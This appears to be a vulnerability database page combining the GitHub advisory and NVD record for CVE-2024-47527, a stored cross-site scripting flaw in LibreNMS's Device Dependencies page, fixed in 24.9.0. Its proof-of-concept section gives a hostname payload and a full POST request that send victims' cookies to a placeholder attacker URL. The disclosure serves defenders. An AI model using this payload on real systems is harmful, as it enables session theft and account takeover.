It could allow authenticated users to execute arbitrary JavaScript code in the context of other users' sessions. Impacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L

5.0 (Medium)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:L/E:P

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "librenms/librenms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "24.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-47527"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-10-01T20:31:04Z",
    "nvd_published_at": "2024-10-01T21:15:07Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Device Dependencies\" feature allows authenticated users to inject arbitrary JavaScript through the device name (\"hostname\" parameter). This vulnerability can lead to the execution of malicious code in the context of other users\u0027 sessions, potentially compromising their accounts and allowing unauthorized actions.\n\n### Details\nThe vulnerability occurs when creating a device within LibreNMS. An attacker can inject arbitrary JavaScript into the hostname parameter. This malicious script is then executed when another user visits the device dependencies page, resulting in an automatic redirect to a website controlled by the attacker. This redirect can be used to steal session cookies or perform other malicious actions.\n\nFor example, the following payload can be used to exploit the vulnerability:\n```t\u0027\u0027 autofocus onfocus=\"document.location=\u0027https://\u003cattacker_url\u003e/?c=\u0027+document.cookie\"```\n\nWhen the device dependencies page is loaded, this payload triggers the JavaScript, causing the user\u0027s browser to redirect to the attacker\u0027s website with any non-httponly cookies in the URL.\n\nThe root cause of this vulnerability is the application\u0027s failure to sanitize the row.hostname value before including it in the HTML output. \n\nThis is evident in the following line of code:\nhttps://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/pages/device-dependencies.inc.php#L74\n\n### PoC\n1. Add a new device using the following payload for the hostname:\n```t\u0027\u0027 autofocus onfocus=\"document.location=\u0027https://\u003cattacker_url\u003e/?c=\u0027+document.cookie\"```\n2. Save the device.\n3. Navigate to the device dependencies page.\n4. Observe that the injected script executes, redirecting the user to the attacker\u0027s website with any non-httponly cookies included in the URL.\n\nExample Request:\n```http\nPOST /addhost HTTP/1.1\nHost: \u003cyour_host\u003e\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: \u003cyour_cookie\u003e\n\n_token=\u003cyour_token\u003e\u0026hostname=t%27%27+autofocus+onfocus%3D%22document.location%3D%27https%3A%2F%\u003cattacker_url\u003e%2F%3Fc%3D%27%2Bdocument.cookie%22\u0026sysName=\u0026hardware=\u0026os=\u0026os_id=\u0026snmpver=v2c\u0026port=\u0026transport=udp\u0026port_assoc_mode=ifIndex\u0026community=\u0026authlevel=noAuthNoPriv\u0026authname=\u0026authpass=\u0026authalgo=SHA\u0026cryptopass=\u0026cryptoalgo=AES\u0026force_add=on\u0026Submit=\n```\n\n### Impact\nIt could allow authenticated users to execute arbitrary JavaScript code in the context of other users\u0027 sessions. Impacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.\n",
  "id": "GHSA-rwwc-2v8q-gc9v",
  "modified": "2024-10-01T21:53:14Z",
  "published": "2024-10-01T20:31:04Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/security/advisories/GHSA-rwwc-2v8q-gc9v"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47527"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/commit/36b38a50cc10d4ed16caab92bdc18ed6abac9685"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/librenms/librenms"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/pages/device-dependencies.inc.php#L74"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:L/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "LibreNMS has Stored Cross-site Scripting vulnerability in \"Device Dependencies\" feature"
}

FKIE_CVE-2024-47527

Vulnerability from fkie_nvd - Published: 2024-10-01 21:15 - Updated: 2024-10-07 19:08

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/librenms/librenms/commit/36b38a50cc10d4ed16caab92bdc18ed6abac9685	Product
	security-advisories@github.com	https://github.com/librenms/librenms/security/advisories/GHSA-rwwc-2v8q-gc9v	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	librenms	librenms	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "E39B6DE8-DAD4-4158-B2BF-93B804AE09FF",
              "versionEndExcluding": "24.9.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the \"Device Dependencies\" feature allows authenticated users to inject arbitrary JavaScript through the device name (\"hostname\" parameter). This vulnerability can lead to the execution of malicious code in the context of other users\u0027 sessions, potentially compromising their accounts and allowing unauthorized actions. This vulnerability is fixed in 24.9.0."
    },
    {
      "lang": "es",
      "value": "LibreNMS es un sistema de monitoreo de red de c\u00f3digo abierto basado en PHP/MySQL/SNMP. Una vulnerabilidad de Cross-Site Scripting (XSS) almacenado en la funci\u00f3n \"Dependencias del dispositivo\" permite a los usuarios autenticados inyectar c\u00f3digo JavaScript arbitrario a trav\u00e9s del nombre del dispositivo (par\u00e1metro \"hostname\"). Esta vulnerabilidad puede provocar la ejecuci\u00f3n de c\u00f3digo malicioso en el contexto de las sesiones de otros usuarios, lo que podr\u00eda comprometer sus cuentas y permitir acciones no autorizadas. Esta vulnerabilidad se solucion\u00f3 en la versi\u00f3n 24.9.0."
    }
  ],
  "id": "CVE-2024-47527",
  "lastModified": "2024-10-07T19:08:41.467",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "LOW",
          "privilegesRequired": "HIGH",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 1.7,
        "impactScore": 5.3,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.4,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 2.7,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2024-10-01T21:15:07.967",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/librenms/librenms/commit/36b38a50cc10d4ed16caab92bdc18ed6abac9685"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/librenms/librenms/security/advisories/GHSA-rwwc-2v8q-gc9v"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2024-47527 (GCVE-0-2024-47527)

BDU:2024-09474

GHSA-RWWC-2V8Q-GC9V

Summary

Details

PoC

Impact

FKIE_CVE-2024-47527

Tags

Sightings

Nomenclature